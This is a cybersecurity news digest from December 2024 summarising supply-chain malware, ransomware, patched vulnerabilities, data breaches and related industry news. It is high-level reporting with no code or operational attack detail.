π What’s going on in the cyber world today?
APT29, PyRDP, RDP Servers, Espionage, HubPhish, HubSpot, Free Forms, Phishing, UAC-0125, Cloudflare Workers, Malware, Army+, Ukraine, Remote Code Execution, Fortinet, Apache, Struts, Critical Vulnerability, Crimson Wine Group, Breach, Personal Information, Hapn, GPS Data, Leak, Pirelli, Positive Behavior Supports Corporation, Breach, Bank Rakyat Indonesia, Ransomware Attack, TP-Link, Routers, Ban, US, Cybersecurity Concerns, UK, White Hat Legal Shield, Raccoon Infostealer, Sentenced, US, Department of Justice, Dutch Data Protection Authority, Netflix, GDPR Violations, BlueQubit, Quantum Software Solutions, Real-World Apps
Listen to the full podcast
π¨Β Cyber Alerts
Rspack developers disclosed a supply chain attack on their npm packages, @rspack/core and @rspack/cli, which were compromised with cryptocurrency mining malware. The malicious versions exfiltrated sensitive data and executed the XMRig miner on Linux hosts using a postinstall script. With over 445,000 weekly downloads, the attack highlights the risks in open-source ecosystems.
A new ransomware strain, NotLockBit, has emerged as a cross-platform threat targeting both Windows and macOS systems. Written in Go, it employs advanced techniques such as AES and RSA encryption to lock files, exfiltration of sensitive data to attacker-controlled storage for double extortion, and a self-deletion mechanism to erase traces of the attack. NotLockBit also uses obfuscation to evade detection and performs detailed reconnaissance, especially on macOS, to gather system information.
Threat actors have been selling a cracked version of Acunetix, a popular commercial web application vulnerability scanner, under the name “Araneida Scanner” on cybercrime forums and Telegram channels. This unauthorized tool is used by cybercriminals for offensive reconnaissance, scraping user data, and identifying vulnerabilities for exploitation on target websites. Researchers found that the cracked version, which bypasses the softwareβs licensing requirements, has been widely used, with operators claiming to have compromised over 30,000 websites in just six months.
Microsoft has swiftly patched a critical privilege escalation vulnerability in Windows 11 version 23H2, identified as CVE-2024-30085, which resides in the Cloud Files Mini Filter Driver (cldflt.sys). This flaw stems from improper validation of user-supplied data when parsing reparse points, allowing attackers to overwrite memory and execute code with SYSTEM-level privileges.
Sophos has released critical hotfixes to address three security vulnerabilities in its firewall products that could allow remote code execution and privileged system access. Two of these vulnerabilities, CVE-2024-12727 and CVE-2024-12728, are rated as critical with CVSS scores of 9.8. The flaws involve a pre-authentication SQL injection in the email protection feature and weak credentials in the High Availability (HA) setup, respectively. The third, CVE-2024-12729, is a post-authentication code injection vulnerability in the User Portal.
π₯ Cyber Incidents
Ukraine recently experienced its largest cyberattack on critical state infrastructure, targeting the nation’s state registers, which store vital data about citizens, businesses, and organizations. The attack, suspected to have originated from Russia, disrupted key systems that facilitate public services and economic activity, leading to a two-week period of downtime. The Justice Ministry, responsible for maintaining these systems, took immediate action by temporarily taking critical services offline to mitigate further damage.
On December 19, 2024, VisionPoint Eye Center reported a data breach to the Attorney General of Texas, revealing that an unauthorized party had gained access to its network in October 2024. The breach exposed sensitive patient information, including first and last names, medical record numbers, health insurance details, and medical information. VisionPoint took immediate action to secure its network and launched an investigation with the help of cybersecurity experts.
Arena Technical Resources, LLC (ATR) reported a data breach to the Massachusetts Attorney General on December 17, 2024, after discovering that an unauthorized party had accessed sensitive consumer information. While the cause of the breach remains unclear, ATR is investigating whether the breach occurred within the companyβs systems or through a third-party vendor.
The Nigerian National Bureau of Statistics (NBS) recently confirmed that its newly revamped website was hacked, disrupting access to vital national data. In a statement shared via its official X (formerly Twitter) account, the agency assured the public that efforts were underway to restore the platform and secure its data. This breach, which occurred just two weeks after the relaunch of the NBS website, has raised concerns over the security of official statistics and the growing vulnerability of public institutions to cyberattacks.
Richmond University Medical Center recently disclosed a data security incident following a cyberattack on May 6, 2023, which led to unauthorized access to its network. The center immediately initiated an investigation, consulting outside cybersecurity experts to assess the potential exposure of personal and protected health information. While the investigation remains ongoing, there have been no reports of identity fraud directly linked to the breach.
π’ Cyber News
The U.S. Department of Health and Human Services (HHS) has issued a warning to the healthcare sector about the increasing vulnerability of Operational Technology (OT) and the Internet of Medical Things (IoMT) to cyberattacks. These devices, crucial for patient care, facility management, and data collection, are often outdated and lack adequate cybersecurity measures, making them prime targets for malicious actors.
The UK Information Commissioner’s Office (ICO) has criticized Googleβs upcoming advertising policy updates, set to take effect in February 2024, which the agency argues could pave the way for unrestricted device fingerprinting in online advertising. The ICO contends that this policy change, which allows advertisers to track users using unique device identifiers such as IP addresses and browser data, may undermine user privacy.
North Korean hackers have escalated their cryptocurrency thefts, stealing an estimated $1.3 billion in 2024, according to a recent report from blockchain analytics firm Chainalysis. This marks a dramatic increase from the $660 million stolen in 2023, highlighting the growing sophistication of cyber operations linked to the Democratic Peopleβs Republic of Korea (DPRK). The report notes a significant rise in high-value attacks, with an increasing number of heists exceeding $50 million.
Daniel Christian Hulea, a Romanian hacker involved in the NetWalker ransomware operation, has been sentenced to 20 years in prison after pleading guilty to computer fraud and wire fraud conspiracy charges. Hulea, who was arrested in Romania in July 2023 and extradited to the United States, participated in deploying ransomware attacks targeting hospitals, law enforcement agencies, and businesses worldwide. The group exploited the COVID-19 crisis to extort victims, earning over $21 million in ransom payments.
SandboxAQ, an Alphabet spinoff specializing in quantum and AI technologies, has successfully raised $300 million in its latest funding round, bringing its total valuation to $5.3 billion. The round saw participation from prominent investors, including Fred Alger Management, T. Rowe Price Associates, and tech luminaries such as Eric Schmidt and Marc Benioff. The new capital will accelerate the development of SandboxAQ’s advanced solutions, including Large Quantitative Models (LQMs) and AI applications across industries like cybersecurity, healthcare, and materials science.
Copyright Β© 2024 CyberMaterial. All Rights Reserved.
